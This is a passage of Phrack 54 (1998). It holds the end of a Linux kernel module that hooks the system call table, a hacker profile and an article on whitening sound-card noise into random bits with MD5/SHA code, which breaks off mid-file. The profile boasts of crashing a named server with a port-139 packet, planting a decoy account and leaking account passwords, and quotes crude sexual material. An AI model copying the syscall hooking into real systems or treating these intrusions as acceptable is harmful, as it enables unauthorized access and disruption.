me voy */ printk("mbtrom: Oh no\n"); return 1; } sys_call_table[__NR_mbtrom] = (void *) funcion; if( __NR_mbtrom != NUMERO_VACIO ) printk("mbtrom: Mmm...\n"); printk("mbtrom: -> %i <-\n",__NR_mbtrom); return 0; } void cleanup_module(void) { sys_call_table[__NR_mbtrom] = 0; printk("mbtrom: Bye.\n"); } <--> <++> linenoise/btrom/sys_null.awk /sys_ni_syscall/ { print "#define SYS_NULL 0x"$1 } <--> 0x6>--------------------------------------------------------------- ---------- ----[ PDM Phrack Doughnut Movie (PDM) last issue was `Miller's Crossing`. PDM53 recipients: None of you suckers. Go rent it. It's well worth your time. PDM54 Challenge: "I have John Murdock... In mind..." 0x7>--------------------------------------------------------------- ---------- ----[ Super Elite People That REad Phrack (SEPTREP) New addiitons: Ron Rivest, W. Richard Stevens Why they are SEP: One is the `R` in RSA. The other writes TCP/IP bibles. ----[ Current List W. Richard Stevens Ron Rivest ------------------------------------------------------------------- ---------- ----[ EOF :DEL] ----[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 04 of 12 -------------------------[ P H R A C K 5 4 P R O P H I L E -----------------[ Personal Handle: ParMaster Call him: Ishmael? SHALL WE PLAY A GAME? Reach him: Through the grapevine Past handles: Trouble Verify, Immediate Lee, Bad Karma, Thoth, Optomystic, (The) Omicron Handle origin: (Quote from Underground page #104) "Par had got his full name -The Parmaster- in his earliest hacking days. Back then, he belonged to a group of teenagers involved in breaking the copy protections on software programs for Apple IIe's, particularly games. Par had a special gift for working out the copy protection parameters, which was a first step in bypassing the manufacturers' protection schemes. The ringleader [sc0tch] of the group [Jedi Hackers] began calling him 'the master of parameters' -The ParMaster- Par, for short. As he moved into serious hacking and developed his expertise in X.25 networks, he kept the name because it fitted nicely in his new environment. 'Par' was a common command on an X.25 pad, the modem gateway to an X.25 network." Date of birth: NOT January 15th! Age at current date: 27 Height: 5'11" Weight: 202 lbs Eye color: Brown Hair color: Brown (Blonde highlights) Computers: Dell 320n 386 laptop, Walkabout vt100 terminal with built-in 2400 baud modem. Sysop/Co-Sysop of: DarkF0RCE Admin of: [Withheld] URLs: http://altavista.digital.com - search - "parmaster" - - submit - read. ----------------[ Favorite things Women: Blondes with blue / green eyes. Chicks in skimpy clothes with accents. Cars: Ferrari and Porsche clubs :-), anything with a jet engine on it. Foods: Chinese, got to have my chinese food. Calamari, Duck, Quail, most seafood. Alcohol: Now, we're talkin'. Jim Beam, Jack Daniels, Crown Royal, Jose Cuervo / Dos Realis, and last but certainly not least Finlandia! Music: The The, The Dickies, Underworld, Kraftwerk, Chemical Brothers, Crystal Method, El Dubarge, CCCP. Movies: They Live, A fish called wanda, 13 Monkees, Little Trouble in Big China, 5th Elemental, True Lies, Killer Klowns from Outer Space, Eraser, Under Siege, Tetsuo Ironman, WarGames, and Sneakers. Authors: Immanuel Velikovsky, Piers Anthony, Terry Brooks, James Gardner, J.R.R. Tolkien and please forgive me for anyone i'm missing. Turn Ons: Traveling in my mind with someone i love. Turn Offs: Pain, agony, hurting and torture. ----------------[ Passions I enjoy scrying the future and doing the great work. This is a very difficult thing to describe in itself. Some of you who know me well enough can see it every once in a while. I'm no artist, but i attempt to do it and sometimes it expresses itself in artistic ways. I love hanging out with my friends, sometimes i need to be alone, but time i spend with my friends is always special. ----------------[ Memorable experiences When the US Secret Service raided me in 1991 and took all my stuff (the 3rd time) including the credit reports of the President (iffie) and Vice President (definitely) of the United States of America. I was in jail in New York waiting for transport, and was never really threatened or hurt, except once and it was a major incident for me but i don't think it was influenced by anyone. When i did an interview for Coast Weekly Magazine in Monterey County in 1993, after this issue came out things really fell apart for me, people started being really mean and really dangerous people started doing really harmful things around me. This article was my one 'play article'. I mentioned a lot of stuff that was currently going on, including the Clinton Administration's use and promotion of the new Clipper Chip device.. I wonder why the guys who did a play article for the San Jose Mercury News didn't receive the same treatment. My relatives always told me life isn't fair, until this time i had plenty of reasons to beleieve that but never did. Incidents following this made me really question how the United States was changing. It especially made me question who is running the world nowadays and who they made a decision to hire under them to work in various agencies. Everything just seemed to have more style before. However, there are also a lot of cool things with style brought about by this, which may be worth the hardships in their value. Using sprite to send an out of bounds packet to port 139 of trv-psitech.com, the server was down for a little bit, a day or two. The error it responded with, "Parameter not found". Creating IRAQ-DEFENSE password PARMASTERG0TTHEM! on tymnet while i was "in". I'm not sure what effect this had during the time i had set it up during Operation Desert Shield. I put it out into the computer underground globally promoting it as an iraqi system i had found. What effect this may have had during that time i still do not know. Logically all i can assume is that it managed to put a lot of hackers who tried it, in one place at the time when they connected to it. As well as promote and possibly move them toward being aware of any enemy computers they may have hacked. Indeed, on the boards i was confronted about it... Specifically by Crimson Death who stated in the posts that it was, in fact, not an iraqi system at all. Interestingly enough in following posts people responded *WITH* actual network addresses and hosts of iraqi systems. Too bad at the time all communications were cut. Most certainly, their access to the outside worlds computers was at least partially if not totally through Bahrain. Every once in a while i would periodically check on tymnet's bahrain gateway and monitor traffic there. For those of you who wonder why i did this, i don't know... I can honestly say I wasn't in conscious control of what i was doing. I have some theories about why, some include a higher power others include some pretty crazy stuff like mind control. I'm leaning somewhat towards the latter because i had some severe memory problems. I could not remember anything about this until I was on a phone interview with Joshua Quittner for the Masters of Deception book, why at that time I recalled it i do not know. I do know that prior to this time in searching through my memory fervently that I had not previously at any other time after 1990 thought about or recollected my actions then. The only thing i remembered was creating ParMasterX75 nui Password par=tymnet gawd! and that was because the account I had used to make IRAQ-DEFENSE had mysteriously changed its properties and now was connected to place calls on the global data network. Prior to that it had only been able to connect to the select hosts of the WEFA group, its rightful owner. I only became aware of this because of Corrupt [MOD] pointing out that I should list out what accounts were active. .. i then saw that he had created an account which could be used to place data calls. John apparently did not know that the properties of the account's access had changed and that it did not have access to do things like that before, if he did he was not offering that knowledge, or even better he may have changed it :-). Disneyland. ----------------[ Boards to mention The board that Mr. Zod set up on the 202 sprintnet system owned by AFOSI and used to train them on how to catch computer hackers *GUFFAW*, my I wonder if they ever found out? Weren't we why they called it that? ROFLMFAO DarkF0RCE, I wonder whatever happened to Derek.. One Man Army.. Hmm, like people are posting these PC Pursuit codes on our board, i wonder where they came from? Phear P0STMASTER's ACOS skills. ROFLMFAO Pegasus, this BBS run on a VAX in switzerland ended up turning out to be part of a sting operation involving law enforcement in europe.... Why do all these k-k00l codes still work tho? Unphamiliar Territories, invalid media's board. Managed to collect together quite a few people with talent as well as some really stupid asshole narks. Can anyone say PMF? Bullet, wherever it is... There you are. BlackNET, so much has been said about this one in circles its not funny. No one knows where it is or how to connect to it? I wonder why... I'm confused. Fuck QSD Channel. Sectec, this board was always an old stand-by for me when the internet was taking off.. Now boards with discussions on packet switched nets like it aren't around. Or, if they are they are hidden and not openly promoting themselves. Most likely, they are somewhere on the internet...It's probably just me... but i don't trust the internet... at all. ALTGER, altos computer systems munich.... i know far too many people from this board in real life now. 12 years ago I never would have thought that this would occur or feasibly see how this would happen. It's still mind-boggling to me. Old skool Apple warez crew: Blue Adept [213], Ubiquitous Hacker, Hollywood, Vampire, Pirette. Others: Piper, Dr. Who, Shatter, Theorem, Nora, and Nasa Pilot. ALTHH, altos computer systems hamburg (later Markt and Technic... tchh), same as altger but I spent MUCH MUCH more time here. I think this is where I got the magic. THE crew: Floyd, TTM, Necrovore-Skyhook-backlash-LineShadow- TouchTone [Xtension], jumpingjackflash, Lutz Pelikan, camelot, pad-gandalf- fusion-power-etc [8LGM], Force-Phoenix-Nom-etc [The Realm], anthrax, there are too many people to list here forgive me if I left you out. You know who you are. The Phoenix Project, what a cool place, where else could I tease Sandy Sandquist about FTS. Illuminati BBS, my account was short lived and i logged in maybe twice. But where else could i see the latest on AD&D games with, The Mentor, Erik Bloodaxe, etc. The initial r00t homepage, boy was this a funny joke. Wait, i'm at a con and now its all real and there's like 40 people here. These people are smart and make lots of money. Hosaka and T3... You could not have known it would turn into this. r00t people who kick ass: Number one for all time - glyph a.k.a necrovore, alhambra, oghost, redragon [tacobell.com], and daemon9. Ripco, well I wasn't on here a lot but it played such an important part in the computer underground over the years i have to at least mention it. It must have also been my first exposure to l0ck. Tons of other people here, this place kept lots of Text files circulating in the underground that might have otherwise been lost. ----------------[ Quotes "I didn't mean for your daddy to spooge all over the minnie mouse pillow on your bed, it wasn't my fault, i told him he could cum in my ass" -- Vamprella "No." -- Agent Steal "Remember when i did that class change for you?" -- U4EA "How did you know i was gonna say that about butter?" -- Nirva "I got approval from Uli to start Chaos Computer Club West, want to be in it?" -- Doc Holiday "Bilbo Baggins, how are youuuuuu" -- Torquemada ----------------[ The future of the computer underground The future? Hmm. Am I the guy to ask? Maybe. Things have changed a lot, the only thing constant is change. It seems there is less chivalry nowadays. The government and corporations painted a picture of us. That picture is not a pretty one. They even have a general psychiatric profile we are all supposed to fall into. Movies, like "Hackers" portray us a certain way also. Kids just starting out, see this and immediately it becomes the way the underground is. The Masters of Deception also promoted this image of the Computer Underground. We end up fighting ourselves more than working together to accomplish goals. I remember a time when things weren't like that. There was very little confrontation between hackers, and information flowed freely. If you ask me, its all a big conspiracy :-). A big conspiracy to keep hackers seperated and fighting among themselves. People like to talk to me about the good old days. Thats all well and good, but those days are over. There can still be another golden age in the Computer Underground. The only thing stopping it, is you. ----[ EOF ---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 05 of 12 -------------------------[ Linux and Random Source Bleaching --------[ Phunda Menta ----[ Introduction Random numbers are often used in cryptography, but good random bits can be hard to come by. Linux has two useful pseudo-devices called /dev/random and /dev/urandom. Catting /dev/random yields a small pool of random bits obtained from internal system state. If you cat this output to your terminal and bang on some keys, you'll notice that you get more random bits. Disk drive accesses, IRQ timings, and key presses; all of this stuff gets hashed into a small pool of entropy that can be accessed directly from /dev/random. /dev/urandom is a stream that hashes /dev/random, and gives you that hash value; then it hashes the last hash and the pool forever. Both give a decent source of random bits. By default, /dev/urandom uses SHA (I know the source comments claim MD5, but if you look at the code, it is SHA). So /dev/urandom is a decent source of pseudo-random bits. /dev/random is better, but it is of limited size. These are very useful, but what we really want is a hardware source of random bits. ----[ The Hardware Solution Most computers have sound cards these days, and a sound card is a great source of potential entropy. Unplug the microphone from your soundcard and cat /dev/audio to a file. Sample maybe 2 or 300k of data. Now play it back, if it sounds like static, you can skip ahead to cleaning up the source. You can also try plugging a 1/8th jack (or whatever you use for input) that has dead-end leads into the mic port. Try both of these methods and find one that gives a clean static hiss. Chances are that on playback all you have is silence, but we want static. Static is random, and randomness is our goal here, so grab an FM radio and tune it to the high end, around 106 or 107 MHz. Find a frequency that gives a good clean hiss, an analog tuner is best for this. If you have a digital tuner and can't get the precision needed to tune-in a good static source then get the best static you can, but you might have a harder time cleaning up this source. If your signal has a high-pitched tone present you can clean this out in a few different ways. The easiest is to use software to strip out that frequency. There is a family of programs for Linux that can help with this (Bio, Mammut, and Ceres). These programs allow very good visualization of the signal and they also allow you to pull the signal apart and isolate different frequencies. Chances are you will have a bunch of junk in the 60 Hz region, probably due to EMI (electro-magnetic interference) from power supplies, along with whatever is giving you that tone. In either case you should shield your FM receiver and the audio cable to avoid EMI. You may be able you shield your soundcard, but I am skeptical of the worth of this. A lot of electronics supply houses sell shielding wrap and preshielded cables. You can also try aluminum foil. I haven't had much luck with aluminum foil, but some people swear by it. Once you have your source set up, jack it into your sound card and sample it at 44 kHz. Run the results through the Diehard testing package (a battery of tests to evaluate the strength of random number generators). Your source won't pass the test. Clean up your source bytes however you need to. Strip out any 60 Hz junk with Mammut by using the Transform|Filter options, you can then use the Transform|Phase Shift option to slide the wave form back into place so that there is no gap at 60 Hz. If your static source has a small amplitude, crank it up by increasing the hardware gain, or use Mammut to change the derivative or the effective gain, whichever you like. I have found no empirical evidence to suggest that one way works better than the others, but, theoretically, changing the slope may be a Bad Thing (tm). You may also want to use the Phase Shift and Threshold options to chop up your signal. You can resynthesize the parts and save them back out. Listening to these parts, and graphing them can help give you an idea of what other things your source signal is doing. If push comes to shove, and you can't weed out all of the bias, or if you need a more hands-free way to clean up the source (and don't have the time or skill to write custom filters) you can just use a cryptographic hash. After you clean up your source, take a look at it with ceres or bio, if the output looks like video static with no noticeable patterns or hot/cold areas then you have sufficiently cleaned up the signal, now you can move on to bleaching the static for use as a random number stream. As a side note, if you ever want to see what a good random distribution is supposed to look like, you can also use output from /dev/urandom. Use sox (stock with Redhat distros) to convert the output stream of /dev/urandom (use a type of 'ul') to AIFF for mammut, or ceres or whatever. The distribution given by /dev/urandom is statistically random so it will tell us what to look for, but /dev/urandom (SHA, basically) is still pseudo-random since complete knowledge of the previous inputs allows us to calculate all future outputs. This is not so with static. ----[ Bleaching the data stream The static coming out of your FM source is skewed white noise. We need to clean it up, so we bleach it. RFC1750 gives a slew of methods to clean up your source. One of the simplest, effective methods of whitening a source is to XOR all the bits in a byte together, yielding one output bit. These bits are then reconstructed into a byte and output. This method has a few advantages. The first big advantage is that you know precisely how many bytes you need to sample in order obtain a certain number of output bytes. XORing is also fast, and easy to implement. Another method of deskewing data is attributed to John von Neumann in RFC1750. This method is called transition mapping. Transition mapping is a relatively simple process. We take two bits from our input. If this bit sequence is 01 or 10 we output a 0 or a 1, respectively. The sequences 00 and 11 are discarded. This method completely deskews a stream of data at the expense of needing an unknown number of input bits. Transition mapping is also a very fast process, and on a lightly skewed input transition mapping can yield more output bits than XOR. Both XOR and transition mapping are fast processes that are good enough to deskew a set of bits such that they will pass the Diehard suite of tests, if the input is suitably clean and random. If the input is somehow correlated, you will have a harder time getting it to pass Diehard. I have found that correlated sources can be cleaned up by XORing the output of an XOR distillation with the output of a transition mapped distillation. Slower constructions can be created out of cryptographic hash functions, but may be trusted more by the paranoid. Hash functions are also recommended if an attacker has the means to somehow affect your random source. If you are worried about this attack, a good way to solve it is with appeal to /dev/random. Use a block cipher such as 3DES to encrypt your random source with a key and initialization vector obtained from /dev/random. If an attacker can bias your source in a predictable way, he still has no idea what bytes you may be using for your actual random numbers. Skew that the attack may introduce into your hardware can first be cleaned with a process like transition mapping and then pumped through a looped hash function or a block cipher. The output of a (decent) hash function or block cipher will pass the Diehard tests. In a heavily used machine, where the entropy pool used by /dev/random will be updated frequently, the output from the above processes can be XORed byte for byte with the stream from /dev/urandom. This is a simple method to mix the streams together for added security. Another method would be to hash N/2 bytes from /dev/urandom and N/2 bytes from your source together, where N is the number of bytes that your hash function will yield. All of these methods are suitable to deskew a data set, but they should not be used blindly. Before putting the resulting bits to use, examine several samples with Diehard and graphic or spectral tests. I have included code to do XOR, transition mapping along with hashing mechanisms.. I have plenty of code to do other hash and block cipher based stuff too, but I did not include that here because the code is not self-contained (it needs some crypto libs). If you want to contact me about the code or if you have some comments or suggestions, I can be reached at phundie@usa.net. ----[ References and Related stuff: RFC1750 Randomness Recommendations for Security http://www.kobira.co.jp/document/rfc/RFC1750.txt Diehard Test Suite http://stat.fsu.edu/~geo/diehard.html Pseudo-Random Number Conditioning http://www.clark.net/pub/cme/html/ranno.html Linux MIDI & Sound Applications (has links to Mammut, Bio and Ceres) http://www.bright.net/~dlphilp/linux_soundapps.html ----[ The code <++> bleach/Makefile all: gcc -w -c md5/md5.c gcc -c sha/shs.c gcc -o sha_distill sha_distill.c shs.o gcc -o md5_distill md5_distill.c md5.o gcc -o xor_distill xor_distill.c gcc -o transmap transmap.c <--> <++> bleach/md5/md5.c /* *********************************************************************** ** md5.c -- the source code for MD5 routines ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 1/91 SRD,AJ,BSK,JT Reference C ver., 7/10 constant corr. ** *********************************************************************** */ /* *********************************************************************** ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. ** ** ** ** License to copy and use this software is granted provided that ** ** it is identified as the "RSA Data Security, Inc. MD5 Message- ** ** Digest Algorithm" in all material mentioning or referencing this ** ** software or this function. ** ** ** ** License is also granted to make and use derivative works ** ** provided that such works are identified as "derived from the RSA ** ** Data Security, Inc. MD5 Message-Digest Algorithm" in all ** ** material mentioning or referencing the derived work. ** ** ** ** RSA Data Security, Inc. makes no representations concerning ** ** either the merchantability of this software or the suitability ** ** of this software for any particular purpose. It is provided "as ** ** is" without express or implied warranty of any kind. ** ** ** ** These notices must be retained in any copies of any part of this ** ** documentation and/or software. ** *********************************************************************** */ #include "md5.h" /* *********************************************************************** ** Message-digest routines: ** ** To form the message digest for a message M ** ** (1) Initialize a context buffer mdContext using MD5Init ** ** (2) Call MD5Update on mdContext and M ** ** (3) Call MD5Final on mdContext ** ** The message digest is now in mdContext->digest[0...15] ** *********************************************************************** */ /* forward declaration */ static void Transform (); static unsigned char PADDING[64] = { 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; /* F, G, H and I are basic MD5 functions */ #define F(x, y, z) (((x) & (y)) | ((~x) & (z))) #define G(x, y, z) (((x) & (z)) | ((y) & (~z))) #define H(x, y, z) ((x) ^ (y) ^ (z)) #define I(x, y, z) ((y) ^ ((x) | (~z))) /* ROTATE_LEFT rotates x left n bits */ #define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n)))) /* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */ /* Rotation is separate from addition to prevent recomputation */ #define FF(a, b, c, d, x, s, ac) \ {(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define GG(a, b, c, d, x, s, ac) \ {(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define HH(a, b, c, d, x, s, ac) \ {(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } #define II(a, b, c, d, x, s, ac) \ {(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \ (a) = ROTATE_LEFT ((a), (s)); \ (a) += (b); \ } /* The routine MD5Init initializes the message-digest context mdContext. All fields are set to zero. */ void MD5Init (mdContext) MD5_CTX *mdContext; { mdContext->i[0] = mdContext->i[1] = (UINT4)0; /* Load magic initialization constants. */ mdContext->buf[0] = (UINT4)0x67452301; mdContext->buf[1] = (UINT4)0xefcdab89; mdContext->buf[2] = (UINT4)0x98badcfe; mdContext->buf[3] = (UINT4)0x10325476; } /* The routine MD5Update updates the message-digest context to account for the presence of each of the characters inBuf[0..inLen-1] in the message whose digest is being computed. */ void MD5Update (mdContext, inBuf, inLen) MD5_CTX *mdContext; unsigned char *inBuf; unsigned int inLen; { UINT4 in[16]; int mdi; unsigned int i, ii; /* compute number of bytes mod 64 */ mdi = (int)((mdContext->i[0] >> 3) & 0x3F); /* update number of bits */ if ((mdContext->i[0] + ((UINT4)inLen << 3)) < mdContext->i[0]) mdContext->i[1]++; mdContext->i[0] += ((UINT4)inLen << 3); mdContext->i[1] += ((UINT4)inLen >> 29); while (inLen--) { /* add new character to buffer, increment mdi */ mdContext->in[mdi++] = *inBuf++; /* transform if necessary */ if (mdi == 0x40) { for (i = 0, ii = 0; i < 16; i++, ii += 4) in[i] = (((UINT4)mdContext->in[ii+3]) << 24) | (((UINT4)mdContext->in[ii+2]) << 16) | (((UINT4)mdContext->in[ii+1]) << 8) | ((UINT4)mdContext->in[ii]); Transform (mdContext->buf, in); mdi = 0; } } } /* The routine MD5Final terminates the message-digest computation and ends with the desired message digest in mdContext->digest[0...15]. */ void MD5Final (mdContext) MD5_CTX *mdContext; { UINT4 in[16]; int mdi; unsigned int i, ii; unsigned int padLen; /* save number of bits */ in[14] = mdContext->i[0]; in[15] = mdContext->i[1]; /* compute number of bytes mod 64 */ mdi = (int)((mdContext->i[0] >> 3) & 0x3F); /* pad out to 56 mod 64 */ padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi); MD5Update (mdContext, PADDING, padLen); /* append length in bits and transform */ for (i = 0, ii = 0; i < 14; i++, ii += 4) in[i] = (((UINT4)mdContext->in[ii+3]) << 24) | (((UINT4)mdContext->in[ii+2]) << 16) | (((UINT4)mdContext->in[ii+1]) << 8) | ((UINT4)mdContext->in[ii]); Transform (mdContext->buf, in); /* store buffer in digest */ for (i = 0, ii = 0; i < 4; i++, ii += 4) { mdContext->digest[ii] = (unsigned char)(mdContext->buf[i] & 0xFF); mdContext->digest[ii+1] = (unsigned char)((mdContext->buf[i] >> 8) & 0xFF); mdContext->digest[ii+2] = (unsigned char)((mdContext->buf[i] >> 16) & 0xFF); mdContext->digest[ii+3] = (unsigned char)((mdContext->buf[i] >> 24) & 0xFF); } } /* Basic MD5 step. Transforms buf based on in. */ static void Transform (buf, in) UINT4 *buf; UINT4 *in; { UINT4 a = buf[0], b = buf[1], c = buf[2], d = buf[3]; /* Round 1 */ #define S11 7 #define S12 12 #define S13 17 #define S14 22 FF ( a, b, c, d, in[ 0], S11, 3614090360); /* 1 */ FF ( d, a, b, c, in[ 1], S12, 3905402710); /* 2 */ FF ( c, d, a, b, in[ 2], S13, 606105819); /* 3 */ FF ( b, c, d, a, in[ 3], S14, 3250441966); /* 4 */ FF ( a, b, c, d, in[ 4], S11, 4118548399); /* 5 */ FF ( d, a, b, c, in[ 5], S12, 1200080426); /* 6 */ FF ( c, d, a, b, in[ 6], S13, 2821735955); /* 7 */ FF ( b, c, d, a, in[ 7], S14, 4249261313); /* 8 */ FF ( a, b, c, d, in[ 8], S11, 1770035416); /* 9 */ FF ( d, a, b, c, in[ 9], S12, 2336552879); /* 10 */ FF ( c, d, a, b, in[10], S13, 4294925233); /* 11 */ FF ( b, c, d, a, in[11], S14, 2304563134); /* 12 */ FF ( a, b, c, d, in[12], S11, 1804603682); /* 13 */ FF ( d, a, b, c, in[13], S12, 4254626195); /* 14 */ FF ( c, d, a, b, in[14], S13, 2792965006); /* 15 */ FF ( b, c, d, a, in[15], S14, 1236535329); /* 16 */ /* Round 2 */ #define S21 5 #define S22 9 #define S23 14 #define S24 20 GG ( a, b, c, d, in[ 1], S21, 4129170786); /* 17 */ GG ( d, a, b, c, in[ 6], S22, 3225465664); /* 18 */ GG ( c, d, a, b, in[11], S23, 643717713); /* 19 */ GG ( b, c, d, a, in[ 0], S24, 3921069994); /* 20 */ GG ( a, b, c, d, in[ 5], S21, 3593408605); /* 21 */ GG ( d, a, b, c, in[10], S22, 38016083); /* 22 */ GG ( c, d, a, b, in[15], S23, 3634488961); /* 23 */ GG ( b, c, d, a, in[ 4], S24, 3889429448); /* 24 */ GG ( a, b, c, d, in[ 9], S21, 568446438); /* 25 */ GG ( d, a, b, c, in[14], S22, 3275163606); /* 26 */ GG ( c, d, a, b, in[ 3], S23, 4107603335); /* 27 */ GG ( b, c, d, a, in[ 8], S24, 1163531501); /* 28 */ GG ( a, b, c, d, in[13], S21, 2850285829); /* 29 */ GG ( d, a, b, c, in[ 2], S22, 4243563512); /* 30 */ GG ( c, d, a, b, in[ 7], S23, 1735328473); /* 31 */ GG ( b, c, d, a, in[12], S24, 2368359562); /* 32 */ /* Round 3 */ #define S31 4 #define S32 11 #define S33 16 #define S34 23 HH ( a, b, c, d, in[ 5], S31, 4294588738); /* 33 */ HH ( d, a, b, c, in[ 8], S32, 2272392833); /* 34 */ HH ( c, d, a, b, in[11], S33, 1839030562); /* 35 */ HH ( b, c, d, a, in[14], S34, 4259657740); /* 36 */ HH ( a, b, c, d, in[ 1], S31, 2763975236); /* 37 */ HH ( d, a, b, c, in[ 4], S32, 1272893353); /* 38 */ HH ( c, d, a, b, in[ 7], S33, 4139469664); /* 39 */ HH ( b, c, d, a, in[10], S34, 3200236656); /* 40 */ HH ( a, b, c, d, in[13], S31, 681279174); /* 41 */ HH ( d, a, b, c, in[ 0], S32, 3936430074); /* 42 */ HH ( c, d, a, b, in[ 3], S33, 3572445317); /* 43 */ HH ( b, c, d, a, in[ 6], S34, 76029189); /* 44 */ HH ( a, b, c, d, in[ 9], S31, 3654602809); /* 45 */ HH ( d, a, b, c, in[12], S32, 3873151461); /* 46 */ HH ( c, d, a, b, in[15], S33, 530742520); /* 47 */ HH ( b, c, d, a, in[ 2], S34, 3299628645); /* 48 */ /* Round 4 */ #define S41 6 #define S42 10 #define S43 15 #define S44 21 II ( a, b, c, d, in[ 0], S41, 4096336452); /* 49 */ II ( d, a, b, c, in[ 7], S42, 1126891415); /* 50 */ II ( c, d, a, b, in[14], S43, 2878612391); /* 51 */ II ( b, c, d, a, in[ 5], S44, 4237533241); /* 52 */ II ( a, b, c, d, in[12], S41, 1700485571); /* 53 */ II ( d, a, b, c, in[ 3], S42, 2399980690); /* 54 */ II ( c, d, a, b, in[10], S43, 4293915773); /* 55 */ II ( b, c, d, a, in[ 1], S44, 2240044497); /* 56 */ II ( a, b, c, d, in[ 8], S41, 1873313359); /* 57 */ II ( d, a, b, c, in[15], S42, 4264355552); /* 58 */ II ( c, d, a, b, in[ 6], S43, 2734768916); /* 59 */ II ( b, c, d, a, in[13], S44, 1309151649); /* 60 */ II ( a, b, c, d, in[ 4], S41, 4149444226); /* 61 */ II ( d, a, b, c, in[11], S42, 3174756917); /* 62 */ II ( c, d, a, b, in[ 2], S43, 718787259); /* 63 */ II ( b, c, d, a, in[ 9], S44, 3951481745); /* 64 */ buf[0] += a; buf[1] += b; buf[2] += c; buf[3] += d; } /* *********************************************************************** ** End of md5.c ** ******************************** (cut) ******************************** */ <--> <++> bleach/md5/md5c.h /* *********************************************************************** ** md5.h -- header file for implementation of MD5 ** ** RSA Data Security, Inc. MD5 Message-Digest Algorithm ** ** Created: 2/17/90 RLR ** ** Revised: 12/27/90 SRD,AJ,BSK,JT Reference C version ** ** Revised (for MD5): RLR 4/27/91 ** ** -- G modified to have y&~z instead of y&z ** ** -- FF, GG, HH modified to add in last register done ** ** -- Access pattern: round 2 works mod 5, round 3 works mod 3 ** ** -- distinct additive constant for each step ** ** -- round 4 added, working mod 7 ** *********************************************************************** */ /* *********************************************************************** ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. ** ** ** ** License to copy and use this software is granted provided that ** ** it is identified as the "RSA Data Security, Inc. MD5 Message- ** ** Digest Algorithm" in all material mentioning or referencing this ** ** software or this function. ** ** ** ** License is also granted to make and use derivative works ** ** provided that such works are identified as "derived from the RSA ** ** Data Security, Inc. MD5 Message-Digest Algorithm" in all ** ** material mentioning or referencing the derived work. ** ** ** ** RSA Data Security, Inc. makes no representations concerning ** ** either the merchantability of this software or the suitability ** ** of this software for any particular purpose. It is provided "as ** ** is" without express or implied warranty of any kind. ** ** ** ** These notices must be retained in any copies of any part of this ** ** documentation and/or software. ** *********************************************************************** */ /* typedef a 32-bit type */ typedef unsigned long int UINT4; /* Data structure for MD5 (Message-Digest) computation */ typedef struct { UINT4 i[2]; /* number of _bits_ handled mod 2^64 */ UINT4 buf[4]; /* scratch buffer */ unsigned char in[64]; /* input buffer */ unsigned char digest[16]; /* actual digest after MD5Final call */ } MD5_CTX; void MD5Init (); void MD5Update (); void MD5Final (); /* *********************************************************************** ** End of md5.h ** ******************************** (cut) ******************************** */ <--> <++> bleach/md5_distill.c #include #include "md5/md5.h" main () { MD5_CTX md5Info; unsigned char c[16]; while (fread(c, 1,16,stdin) == 16) { MD5Init(&md5Info); MD5Update(&md5Info,c,16); MD5Final(&md5Info); fwrite(md5Info.digest,1,16,stdout); } } <--> <++> bleach/sha/shs.c /* --------------------------------- SHS.C ------------------------------- */ /* * NIST proposed Secure Hash Standard. * * Written 2 September 1992, Peter C. Gutmann. * This implementation placed in the public domain. * * Comments to pgut1@cs.aukuni.ac.nz */ #include #include "shs.h" /* The SHS f()-functions */ #define f1(x,y,z) ( ( x & y ) | ( ~x & z ) ) /* Rounds 0-19 */ #define f2(x,y,z) ( x ^ y ^ z ) /* Rounds 20-39 */ #define f3(x,y,z) ( ( x & y ) | ( x & z ) | ( y & z ) ) /* Rounds 40-59 */ #define f4(x,y,z) ( x ^ y ^ z ) /* Rounds 60-79 */ /* The SHS Mysterious Constants */ #define K1 0x5A827999L /* Rounds 0-19 */ #define K2 0x6ED9EBA1L /* Rounds 20-39 */ #define K3 0x8F1BBCDCL /* Rounds 40-59 */ #define K4 0xCA62C1D6L /* Rounds 60-79 */ /* SHS initial values */ #define h0init 0x67452301L #define h1init 0xEFCDAB89L #define h2init 0x98BADCFEL #define h3init 0x10325476L #define h4init 0xC3D2E1F0L /* 32-bit rotate - kludged with shifts */ #define S(n,X) ((X << n) | (X >> (32 - n))) /* The initial expanding function */ #define expand(count) W [count] = W [count - 3] ^ W [count - 8] ^ W [count - 14] ^ W [count - 16] /* The four SHS sub-rounds */ #define subRound1(count) \ { \ temp = S (5, A) + f1 (B, C, D) + E + W [count] + K1; \ E = D; \ D = C; \ C = S (30, B); \ B = A; \ A = temp; \ } #define subRound2(count) \ { \ temp = S (5, A) + f2 (B, C, D) + E + W [count] + K2; \ E = D; \ D = C; \ C = S (30, B); \ B = A; \ A = temp; \ } #define subRound3(count) \ { \ temp = S (5, A) + f3 (B, C, D) + E + W [count] + K3; \ E = D; \ D = C; \ C = S (30, B); \ B = A; \ A = temp; \ } #define subRound4(count) \ { \ temp = S (5, A) + f4 (B, C, D) + E + W [count] + K4; \ E = D; \ D = C; \ C = S (30, B); \ B = A; \ A = 